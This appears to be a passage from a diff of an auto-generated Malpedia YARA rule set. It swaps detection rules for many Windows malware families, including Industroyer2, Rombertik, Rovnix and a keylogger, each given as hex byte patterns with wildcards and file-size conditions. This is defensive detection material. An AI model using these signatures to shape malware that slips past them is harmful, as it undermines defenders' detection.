be02000000 } - $sequence_8 = { 68ac5e0110 56 50 53 8bcf e8???????? } - $sequence_9 = { a3???????? 39a81c010000 7405 8b4010 eb02 33c0 ffd0 } + $sequence_0 = { b910000000 e8???????? 4889442430 c700ffffffff 48c74008ffffffff 8b4c2438 8908 } + $sequence_1 = { b9c8dcfb75 ffc1 c1e106 83e9ff 83c101 6807ab8f5e 4c893424 } + $sequence_2 = { ffd0 eb05 bd01000000 440fb6e5 443bed 7c7a 488b15???????? } + $sequence_3 = { 8bc3 e9???????? 41b805000000 488d153c9a1800 488bcf e8???????? 85c0 } + $sequence_4 = { ffcf 488d9512070000 4903d4 4c63c7 664289b445100f0000 e8???????? 6639b510170000 } + $sequence_5 = { 4881cb3f000000 48c7c000020000 4981c46f000000 4809f0 4d0fb72424 4881c204000000 4809c6 } + $sequence_6 = { 83fe07 7772 4c8d0dad8df9ff 4863c6 418b8481f0750600 4903c1 ffe0 } + $sequence_7 = { e9???????? 488d05de191400 894c2420 4c8d2dabb30f00 89742424 eb42 488d05aeb30f00 } + $sequence_8 = { 4c8d0d91850b00 8d4a98 448d42ef e8???????? e9???????? 4c8b4310 488bd7 } + $sequence_9 = { 7422 41b8a3000000 488d15c7ff0900 e8???????? 48898380000000 4885c0 0f842f010000 } condition: - 7 of them and filesize <2031616 + 7 of them and filesize <8377344 } -rule MALPEDIA_Win_Industroyer2_Auto : FILE +rule MALPEDIA_Win_Nettraveler_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "01c28e59-8cb1-5bf1-9de6-64ce0dd77d4a" + id = "494d7b5b-e566-59c9-b0c7-fe620930e93d" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.industroyer2" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.industroyer2_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nettraveler" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nettraveler_auto.yar#L1-L127" license_url = "N/A" - logic_hash = "bbf01a0f560944dbb85cdfc8fdeff74a884348b77c6b1a1a74790ea421be78c4" + logic_hash = "ca8cfc3fd83dc1a9e063f01d8d61d4c33014172373ecd89db27946ab9125b077" score = 75 quality = 75 tags = "FILE" @@ -175240,32 +177962,32 @@ rule MALPEDIA_Win_Industroyer2_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 732c 837df800 7426 8b45fc 8b4df4 8b1481 89559c } - $sequence_1 = { 89480c 8b55fc 8b451c 894210 694d18a0860100 034d1c } - $sequence_2 = { eb07 c745d000000000 8b4508 8a4dd0 888845000100 } - $sequence_3 = { 8b4d08 e8???????? 8945fc 68???????? 8b4508 50 } - $sequence_4 = { 885103 8b45fc 8b4804 8b551c 8b8238000100 894104 8b4dfc } - $sequence_5 = { c1e200 8b45fc 8b4d08 8a1411 885005 b801000000 d1e0 } - $sequence_6 = { 8b4df0 51 ff15???????? 85c0 7406 c645ff01 eb04 } - $sequence_7 = { c6400c00 8b4dfc c641140a 6a04 8b55fc 83c210 52 } - $sequence_8 = { 837df800 742c 8b55fc 8b45f4 8b0c90 898d78ffffff 8b9578ffffff } - $sequence_9 = { 8b45fc 50 e8???????? 0fb6c8 85c9 7444 68???????? } + $sequence_0 = { ffd3 c70424???????? ff7508 a3???????? } + $sequence_1 = { 81ec8c000000 56 57 ff7508 8bf1 e8???????? 8bf8 } + $sequence_2 = { 83650800 83c70c 83c428 85ff 897df0 0f8eb6000000 bf00040000 } + $sequence_3 = { 53 68???????? ffd6 80a5dcf7ffff00 59 59 baff000000 } + $sequence_4 = { 0bdf 33da 035dc4 8d9c18827e53f7 8bc3 c1e81a c1e306 } + $sequence_5 = { 0bd7 8b7dfc 0355e4 8dbc178a4c2a8d 8bd7 c1e214 c1ef0c } + $sequence_6 = { ff750c ff75d4 50 e8???????? 83c414 8945ec } + $sequence_7 = { e8???????? 83c418 8d45fc 897dfc 50 } + $sequence_8 = { ffd7 8945fc 8d4308 50 ffd7 8065e400 } + $sequence_9 = { 33df 035dc0 8d9c1992cc0c8f 8bcb c1e30a c1e916 0bcb } condition: - 7 of them and filesize <100352 + 7 of them and filesize <106496 } -rule MALPEDIA_Win_Bubblewrap_Auto : FILE +rule MALPEDIA_Win_Rombertik_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "72aba578-e67d-518b-a6f8-45bcf7609dfd" + id = "b8dc9071-13ab-5355-92f1-2480db82efe0" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bubblewrap" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.bubblewrap_auto.yar#L1-L126" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rombertik" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rombertik_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "461e952cc7ab9a2107d029741d486c2b8296d9f39ea5fcdb3208aa0e3f3d47fd" + logic_hash = "c93757fb5684dd7302fa22ed1f1f21c4fae8e9b1525dbcd58ab0d5e9fecbc821" score = 75 quality = 75 tags = "FILE" @@ -175279,32 +178001,32 @@ rule MALPEDIA_Win_Bubblewrap_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 68???????? 68???????? e8???????? 8b08 83c408 890d???????? 8b5004 } - $sequence_1 = { ffd6 8d542464 68???????? 52 ffd6 b900020000 } - $sequence_2 = { 56 57 6a02 8d442418 33f6 55 50 } - $sequence_3 = { 880c1a 83c9ff f2ae f7d1 49 8d7c1a01 8bd1 } - $sequence_4 = { 81ec08020000 53 56 57 ff15???????? } - $sequence_5 = { f3a5 6870010000 e8???????? 8d442448 50 6870010000 } - $sequence_6 = { 8d6ced00 89542418 c1e503 8bc5 8bdd 25ff030000 } - $sequence_7 = { 880f 8810 7c89 5d 5f 5e 5b } - $sequence_8 = { c644241f78 c644242011 c644242106 c644242274 } - $sequence_9 = { 83c404 a801 740d 8d54240c 52 e8???????? 83c404 } + $sequence_0 = { 8945f4 3bc1 0f8271ffffff 5f 5e } + $sequence_1 = { 8bff 8b4104 85c0 7446 83c0f8 33ff } + $sequence_2 = { 8bcf e8???????? 50 8d8dfcfeffff } + $sequence_3 = { 47 41 3bfb 72be 8b5df0 } + $sequence_4 = { 50 ff15???????? 8bf8 85ff 0f8488000000 } + $sequence_5 = { 33db 57 895df8 ff15???????? 85c0 } + $sequence_6 = { 8b5d0c 85db 0f84cb000000 837d1400 0f84c1000000 817d18a00f0000 0f87b4000000 } + $sequence_7 = { 50 8bc2 50 8d8decfeffff 51 ffd6 } + $sequence_8 = { 895dfc 85db 0f84d8000000 85ff } + $sequence_9 = { 6a03 6a00 6a02 68000000c0 68???????? ff15???????? 8906 } condition: - 7 of them and filesize <57136 + 7 of them and filesize <73728 } -rule MALPEDIA_Win_Gsecdump_Auto : FILE +rule MALPEDIA_Win_Covid22_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "b81c271d-e899-564d-95e1-3cec03c5f3c1" + id = "c5fffc59-fc04-58e5-a2b5-2bc6fea3300e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gsecdump" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.gsecdump_auto.yar#L1-L132" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.covid22" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.covid22_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "6bf60f2f5adb73a31aef591a4e85eec2a9f319786a1094bc7166c02e51c8574f" + logic_hash = "905302ef095dc2c070563a8e4e5a8650bbd8c803b32ba6a0b53beb2cdcb2cfaa" score = 75 quality = 75 tags = "FILE" @@ -175318,71 +178040,71 @@ rule MALPEDIA_Win_Gsecdump_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c7060f000000 c746fc00000000 c646ec00 83c61c 8d56e8 3bd7 } - $sequence_1 = { 8b442438 50 e8???????? 83c404 8b4c2478 64890d00000000 59 } - $sequence_2 = { 7205 e8???????? 83460401 e9???????? 8b06 83f8fe } - $sequence_3 = { 7376 8bcf c1e105 894d14 03cb 51 50 } - $sequence_4 = { 8d57fe 52 53 8d442430 50 8bce e8???????? } - $sequence_5 = { 51 e8???????? 83c408 85ff 8bf7 0f869afdffff 8b4c2414 } - $sequence_6 = { 50 8d8c24bc000000 c684244401000004 e8???????? 8d4c2428 889c2438010000 e8???????? } - $sequence_7 = { 8b4604 3b442424 0f84a3000000 8b06 83f8fe 7427 85c0 } - $sequence_8 = { 50 e8???????? 8b4538 3bc6 7409 50 e8???????? } - $sequence_9 = { 33d2 59 f7f1 33f6 8d2c95908c4400 8b7d00 85ff } + $sequence_0 = { 8b35???????? 7507 6af6 ffd6 894514 395d18 7507 } + $sequence_1 = { 50 8b4508 ff30 ff15???????? 8b45fc c9 } + $sequence_2 = { 5a e8???????? ff35???????? 6801000000 e8???????? 21c0 } + $sequence_3 = { e8???????? ba???????? 8d0d30b24000 e8???????? ba???????? 8d0d34b24000 e8???????? } + $sequence_4 = { 0fb6540c02 83e20f 0fb692e0904000 885005 0fb6540c03 c1ea04 0fb692e0904000 } + $sequence_5 = { ff35???????? e8???????? 21c0 0f846f020000 a1???????? } + $sequence_6 = { 50 a1???????? 50 50 e8???????? ff05???????? ff35???????? } + $sequence_7 = { b801000000 eb02 31c0 21c0 0f8409020000 a1???????? } + $sequence_8 = { e8???????? c21000 8b442404 85c0 7413 ff742408 ff30 } + $sequence_9 = { 83c404 6801000000 e9???????? 8b15???????? 31c9 e8???????? 750b } condition: - 7 of them and filesize <630784 + 7 of them and filesize <1955840 } -rule MALPEDIA_Win_Goopic_Auto : FILE +rule MALPEDIA_Win_Unidentified_082_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "af6daaef-2e7b-547b-a95b-f4526c03929f" - date = "2023-12-06" - modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.goopic" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.goopic_auto.yar#L1-L125" + id = "7772581c-e8cf-5615-a758-46ef9c1fc0b0" + date = "2021-10-07" + modified = "2021-10-08" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_082" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_082_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "09cf2d520274006f21b8dfb7e13c7364d612efefae1767684cd3f4a4dac575b5" + logic_hash = "fdfe1ddce9f77ac8b465b0ddebe868c5e77078cf2b2457573a5b3810682f45ee" score = 75 quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20231130" - malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" - malpedia_version = "20230808" + malpedia_rule_date = "20211007" + malpedia_hash = "e5b790e0f888f252d49063a1251ca60ec2832535" + malpedia_version = "20211008" malpedia_license = "CC BY-SA 4.0" malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d85fcf7ffff 50 ff15???????? 6a00 6a00 6a00 6a00 } - $sequence_1 = { 57 ff742428 ff15???????? 85c0 740d } - $sequence_2 = { c785d0fdffff2c020000 ff15???????? 8bf0 8d85d0fdffff 50 56 } - $sequence_3 = { 50 8b08 ff11 8b442414 50 } - $sequence_4 = { ff15???????? 8bd7 8d8df8bfffff e8???????? 57 68???????? ff15???????? } - $sequence_5 = { 8bfa ffd6 8bd8 895dfc } - $sequence_6 = { 50 6aff 68???????? 6a00 6a00 ffd7 8d842448190000 } - $sequence_7 = { 0f8664ffffff 8b4dfc 33c0 5f 5e 33cd 5b } - $sequence_8 = { 53 ff15???????? 8bf8 85ff 0f84f4000000 56 6a00 } - $sequence_9 = { c785c0fdffff305d4000 eb0a c785c0fdffff245d4000 8d85b4fdffff c785c4fdffff3c5d4000 50 } + $sequence_0 = { 4c8d0dbc190200 0f1f4000 0f1f840000000000 418d4801 } + $sequence_1 = { ff5018 4c634510 488d0df40a0200 488bd8 33c0 } + $sequence_2 = { 4c634510 488d0d93fa0100 488bd8 33c0 488bd3 488905???????? 488905???????? } + $sequence_3 = { ff15???????? 488b0cdf ff15???????? 48c704dfffffffff } + $sequence_4 = { 4885c0 0f84ac010000 48833d????????00 0f849e010000 48833d????????00 0f8490010000 48833d????????00 } + $sequence_5 = { 488b0d???????? 8b5108 488b4910 4533c9 458d4130 4c89742420 } + $sequence_6 = { 33c0 e9???????? 8a07 4c8b7c2448 4c8d25a64c0100 4b8b0cfc ffc3 } + $sequence_7 = { 0f1f4000 0f1f840000000000 418d4801 0fb6c2 41ffc0 f7da } + $sequence_8 = { 488b4f18 4c8d4d10 488b01 488d1587000200 41b810000000 ff5018 4c634510 } + $sequence_9 = { 48894598 eb03 4533f6 488b05???????? 80782e00 740a 80782000 } condition: - 7 of them and filesize <114688 + 7 of them and filesize <414720 } -rule MALPEDIA_Win_Ddkeylogger_Auto : FILE +rule MALPEDIA_Win_Fireball_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "32af4d2e-12e0-5512-a4a7-e09c0d4c8550" + id = "41b2d4de-af91-5e95-ba91-5bc661ef7417" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ddkeylogger" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ddkeylogger_auto.yar#L1-L122" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fireball" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.fireball_auto.yar#L1-L120" license_url = "N/A" - logic_hash = "03458a2b11f7d3c85fa0851f46b24d084521ba159cb6b960088359db4227b8a0" + logic_hash = "0f627ea55086f489b8cd11c65d68f2e0680aa8b1619660718f20b28106c4357c" score = 75 quality = 75 tags = "FILE" @@ -175396,34 +178118,34 @@ rule MALPEDIA_Win_Ddkeylogger_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8bf7 83e61f c1e606 03348580ee4500 } - $sequence_1 = { 51 894df4 8955fc 8945f8 e8???????? 83c408 } - $sequence_2 = { 8bc8 c1e902 f3a5 8bc8 8d95e8faffff 83e103 52 } - $sequence_3 = { 0fb64f08 80cbff d2e3 40 f6d3 205c30ff 0fb64f08 } - $sequence_4 = { 0405 c3 f6c20c 7409 f6c208 0f95c0 } - $sequence_5 = { 52 50 8b81e0000000 ffd0 837df804 75e8 } - $sequence_6 = { c745fc00000000 e8???????? 83c40c 8d85ccfaffff 50 8d8df0fdffff 51 } - $sequence_7 = { 50 57 ffd3 8945bc 8d45c8 50 } - $sequence_8 = { ff248d4cf74000 8d48cf 80f908 7706 6a03 } - $sequence_9 = { 6bc930 8975e0 8db1c0624100 8975e4 } + $sequence_0 = { 52 8bce e8???????? b101 e8???????? } + $sequence_1 = { 30a830ac30b0 30b830cc30e8 30f0 30f4 3010 3118 311c31 } + $sequence_2 = { 8b0f 8bc1 c1f805 83e11f 8b0485000a2500 c1e106 80640804fe } + $sequence_3 = { 68???????? 8d8c24a4000000 c78424b800000007000000 c78424b400000000000000 } + $sequence_4 = { c78424a400000000000000 6689842494000000 837c247808 720c ff742464 e8???????? } + $sequence_5 = { 53 ff15???????? 85c0 0f85c2feffff } + $sequence_6 = { c78518f5ffff07000000 c78514f5ffff00000000 66898504f5ffff 83bdf4f5ffff08 720e } + $sequence_7 = { c68558fbffff00 7504 33c9 eb12 8d8d64f9ffff } + $sequence_8 = { 8d442417 50 8d542434 8d8c2498000000 c744244c07000000 c744244800000000 e8???????? } + $sequence_9 = { 8bf1 c785e8fbffff00000000 e8???????? 83c40c 8d85ecfbffff 6808020000 } condition: - 7 of them and filesize <808960 + 7 of them and filesize <335872 } -rule MALPEDIA_Win_Rovnix_Auto : FILE +rule MALPEDIA_Win_Feed_Load_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "6d0efd0b-959b-5f07-9cf2-cb58dc189913" + id = "de841c4a-765f-51dc-8d45-847efc3fe997" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rovnix" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rovnix_auto.yar#L1-L389" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.feed_load" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.feed_load_auto.yar#L1-L128" license_url = "N/A" - logic_hash = "5e2878b298d1848da7bc42b9c6ab694e8616fdab743143a73f75bed6d973bc79" + logic_hash = "904d3316a4655c20d123c0cfc976a8494c8f04b302e9078044dfcb4ef1ebf390" score = 75 - quality = 50 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -175435,68 +178157,34 @@ rule MALPEDIA_Win_Rovnix_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8bf8 83c335 c1e902 ad 2bc3 ab e2fa } - $sequence_1 = { 7405 57 6a00 ffd2 89442408 } - $sequence_2 = { 83e7f0 89542418 83c710 8bea } - $sequence_3 = { be???????? 8b15???????? 83e7f0 89542418 } - $sequence_4 = { 60 bf40090000 be???????? 8b15???????? } - $sequence_5 = { ff15???????? 8b550c 884304 8bc2 c1e802 25ff000000 8d4cc324 } - $sequence_6 = { 83c220 85c0 7404 3bc2 } - $sequence_7 = { 7405 8d4e1c 8908 8b4508 } - $sequence_8 = { 7511 ff4e18 7505 e8???????? } - $sequence_9 = { 85c0 e8???????? 8be5 5d } - $sequence_10 = { 894804 8b4608 8b4e0c 8901 894804 8b4718 } - $sequence_11 = { 8936 8d7e08 897f04 893f 894e14 895e10 } - $sequence_12 = { 83f919 7703 83c220 85c0 } - $sequence_13 = { 8975d0 c745d800020000 8975d4 8975dc 8975e0 } - $sequence_14 = { 8b7e10 eb06 8b5d0c 8b7d08 8bcf ff15???????? } - $sequence_15 = { 7521 8bc3 c1e802 25ff000000 8d4cc724 8b01 } - $sequence_16 = { 5d c3 85c9 e8???????? } - $sequence_17 = { 5d c3 85c0 e8???????? } - $sequence_18 = { 16 85c9 23d2 59 } - $sequence_19 = { 55 8bec 85db 85c9 } - $sequence_20 = { 23db 81e1ff000000 23c9 83440c0404 } - $sequence_21 = { 23c9 81e1ffff0000 85c0 51 85c9 e8???????? 8be5 } - $sequence_22 = { 8b4d08 85d2 81e1ff000000 85db 83440c0404 23d2 } - $sequence_23 = { 45 7d58 95 08c1 a3???????? 5c 46 } - $sequence_24 = { 59 23db 23d2 81e1ffff0000 85c0 85c0 51 } - $sequence_25 = { 20a8261ce0dc 3d6235c121 652572f7a5a7 ce } - $sequence_26 = { 7e27 0cc7 8e610b 69f8d60e5ca1 2e08450d } - $sequence_27 = { 03ea 680c000000 012c24 8b0d???????? } - $sequence_28 = { 17 d3fb 7127 49 ee } - $sequence_29 = { 4c8bdc 49895b08 49897310 57 4883ec30 33c0 } - $sequence_30 = { 4b af 7dce 98 } - $sequence_31 = { 498be8 488bfa 7429 498d4320 488bd1 498d4bc8 } - $sequence_32 = { 498b5b38 498b6b40 498b7348 8bc7 498be3 415f } - $sequence_33 = { 61 54 99 46 45 e7f2 0ad7 } - $sequence_34 = { 807bf9f3 53 56 b88302010b 92 090468 } - $sequence_35 = { 59 85c0 85c0 81e1ffff0000 23d2 85db 51 } - $sequence_36 = { ff15???????? 4c8d5c2460 498b5b18 498b6b20 } - $sequence_37 = { 488364245800 488364247000 488364247800 488d442430 4c8d4c2440 } - $sequence_38 = { 46 92 c55151 a2???????? d24b46 } - $sequence_39 = { ff15???????? b8feff0000 483bf0 480f47f0 } - $sequence_40 = { 23d2 85db 8b4d08 85db } - $sequence_41 = { 81e1ffff0000 23d2 23c9 51 85c0 e8???????? } - $sequence_42 = { e19b 06 6d 99 } - $sequence_43 = { 61 c0390e 60 da57b2 } + $sequence_0 = { 48897c2428 4d8bc5 41b940200000 e8???????? 85c0 0f84e2000000 } + $sequence_1 = { 0f97c1 493bd2 eb27 4c8d42ff 418a00 4d8d4c24ff 413801 } + $sequence_2 = { 41898500400000 488bfd 4d8bfa bd01000000 83fb0d 0f8c42030000 41690ab179379e } + $sequence_3 = { 668928 e8???????? 4c8d86500c0000 488bcf e8???????? 4c8d442440 488bcf } + $sequence_4 = { 7876 3b1d???????? 736e 488bc3 488bf3 48c1fe06 4c8d2d7a220200 } + $sequence_5 = { 0f8c60040000 41837e0800 4c8d05b755ffff 7429 49635608 48035608 0fb60a } + $sequence_6 = { 8bd5 ff15???????? 448bc5 488bd6 488bc8 4c8bf0 } + $sequence_7 = { 488bc2 4903c7 4103df 803800 75f5 3bdf 7207 } + $sequence_8 = { 4c8d3de9c00100 49393cdf 7402 eb22 e8???????? 498904df } + $sequence_9 = { 488d157b020200 488d4d88 e8???????? cc } condition: - 7 of them and filesize <548864 + 7 of them and filesize <512000 } -rule MALPEDIA_Win_Stegoloader_Auto : FILE +rule MALPEDIA_Win_Polyglot_Ransom_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "e9d6ede2-9401-5de2-b06b-905a99f741c9" + id = "d8c62ea3-2069-58e5-94bb-e4265ed7677c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stegoloader" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.stegoloader_auto.yar#L1-L174" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.polyglot_ransom" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.polyglot_ransom_auto.yar#L1-L128" license_url = "N/A" - logic_hash = "b778718a0682061dce35a7f47c0081e22977d884e10f4fca4ca7c1e5214e1ed2" + logic_hash = "ecee7d25f676a4e4884cb2efcc0294d55515d4c6450d9ce1a59e043bd0d80704" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -175508,38 +178196,32 @@ rule MALPEDIA_Win_Stegoloader_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { f7db 1bdb f7d3 235dfc 3bdf 7409 } - $sequence_1 = { 4a 75f0 8a043e 46 84c0 7669 0fb6c0 } - $sequence_2 = { 59 eb32 8bc8 837db806 } - $sequence_3 = { 59 7422 43 3b5e14 76e2 ff45fc 837dfc02 } - $sequence_4 = { 0f84f9010000 c645a443 c645a54d c645a644 } - $sequence_5 = { c645e968 c645ea65 c645eb6c c645ec6c c645ed5f c645ee54 c645ef72 } - $sequence_6 = { 7415 ff75f4 8bcb ff7604 } - $sequence_7 = { 8d0481 8b0438 03c7 3bc6 720e 8b4df0 03ce } - $sequence_8 = { ff742414 8bce ff5004 84c0 } - $sequence_9 = { 03df 8b03 03c7 33c9 3808 7407 } - $sequence_10 = { 8d0448 0fb70438 eb07 662b5e10 0fb7c3 8b4e1c } - $sequence_11 = { 83c604 4b 890411 75db eb0a } - $sequence_12 = { 33db 56 668945f4 83c002 33f6 3bd3 } - $sequence_13 = { 7e68 8b4d0c 8b4508 53 56 57 8b7d10 } - $sequence_14 = { 7409 8b01 6a01 ff10 897d0c } - $sequence_15 = { 8a4510 f6d8 1bc0 83e004 894510 e8???????? 3bc3 } + $sequence_0 = { ff74244c e8???????? 8944241c 894c2448 6a07 895c2450 } + $sequence_1 = { 6a30 e8???????? 59 59 8d4d80 51 6801010000 } + $sequence_2 = { ff5004 83c328 ff4d10 75ad ff75f0 ff15???????? } + $sequence_3 = { be???????? 66f7c30040 6a04 5a 747a 6681fb0b40 756c } + $sequence_4 = { 50 68???????? e8???????? 8b85f0fdffff 59 59 8b08 } + $sequence_5 = { 627265 206f20 656c 696d696e617220 61 7263 6869766f73 } + $sequence_6 = { eb4f 8bf3 8bf9 a5 a5 a5 a5 } + $sequence_7 = { 59 59 751c 8b45fc 8b4020 85c0 } + $sequence_8 = { 5e c20400 68???????? 6a20 33c0 } + $sequence_9 = { 40 5e eb02 32c0 8b4d74 33cd } condition: - 7 of them and filesize <802816 + 7 of them and filesize <1392640 } -rule MALPEDIA_Win_Acidbox_Auto : FILE +rule MALPEDIA_Win_Eagerbee_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "d24270e3-4ecb-5df0-834e-54ac9b4880c3" + id = "2c944b22-0670-5d3a-8325-748c1204ab76" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.acidbox" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.acidbox_auto.yar#L1-L127" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.eagerbee" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.eagerbee_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "7566f8c225df846294fd9c5a92e8c14928b074fdcd922768eae6047a40a5ef6e" + logic_hash = "128c0a374c8b1a00f6b82c3fc65b3e7ab4f3e40ebdc9cd2ac65e4a7f259bdca2" score = 75 quality = 75 tags = "FILE" @@ -175553,32 +178235,32 @@ rule MALPEDIA_Win_Acidbox_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 418bb590000000 4903f4 4889742438 413b8594000000 0f8311010000 397e0c 0f8408010000 } - $sequence_1 = { 4154 4155 4156 4157 4883ec28 4c8b7128 448b6108 } - $sequence_2 = { c780d8feffffd3731048 c780dcfeffffffff00ff c780e0feffffffe0cccc c780e4feffffffff0000 4d8920 4d8921 } - $sequence_3 = { 0fb6ca 4103c9 4403f0 0fb74562 41d3e0 418bc9 49ffc7 } - $sequence_4 = { ff15???????? 8d043e 898318170000 eb2f 8d8702010000 } - $sequence_5 = { 4883c438 c3 488bc4 48895810 48897018 57 4154 } - $sequence_6 = { eb09 4584c0 7908 418b4124 89442420 85c0 } - $sequence_7 = { 4c8b4de0 c70705000000 f7471000040000 0f840c010000 8b5f48 413bdd 410f47dd } - $sequence_8 = { 7d07 8bd7 413bc7 7d03 418bd1 8b4b28 488b4310 } - $sequence_9 = { 0fb79f02040000 418b8a14170000 418bc3 2bc3 } + $sequence_0 = { 493bc7 753b 488b05???????? ff05???????? 488bcb ff90f8000000 488d1560d80100 } + $sequence_1 = { 488d15b7aa0100 41b908000000 48c7c101000080 498943d8 c744245810000000 ff15???????? 85c0 } + $sequence_2 = { 0f44d8 eb0b 8b7c245c e8???????? 8bd8 85db 7415 } + $sequence_3 = { 744c 488d15be810200 488bcb 4d8bc7 e8???????? 488b05???????? } + $sequence_4 = { 8b01 eb06 ff90c0000000 410fb7cc eb3b 488bcf } + $sequence_5 = { 85c0 751e 4c8b4c2448 4c8b442440 488d1517640100 488b4c2430 ff15???????? } + $sequence_6 = { 8d6f07 458d77c7 8d5fce 488d8c2470010000 664489bc2470010000 6689bc2472010000 } + $sequence_7 = { c68424c20000006f c68424c300000073 4088bc24c4000000 c68424c500000073 c68424c60000006f c68424c700000063 4488bc24c8000000 } + $sequence_8 = { 8bd8 ebbf ff90e0000000 8bd8 85db 0f8481020000 3bdf } + $sequence_9 = { 4533c9 4533c0 48896c2458 4489642450 4489742454 48898698080000 c7869408000004000000 } condition: - 7 of them and filesize <589824 + 7 of them and filesize <422912 } -rule MALPEDIA_Win_Unidentified_077_Auto : FILE +rule MALPEDIA_Win_Purplewave_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "882d313e-f7f0-5285-8af9-6252268fd85d" + id = "bc61a32f-ee96-5e25-892f-9d381408f659" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_077" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_077_auto.yar#L1-L116" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.purplewave" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.purplewave_auto.yar#L1-L133" license_url = "N/A" - logic_hash = "40d4971486b6904e4039a2237673f8c9270e32fac79f99c950b8e92b2f7aa0ab" + logic_hash = "5efe0dc0002836bd228e34e2c06d2e0edc1c85c62aac77610517f67f8f987125" score = 75 quality = 75 tags = "FILE" @@ -175592,32 +178274,32 @@ rule MALPEDIA_Win_Unidentified_077_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - 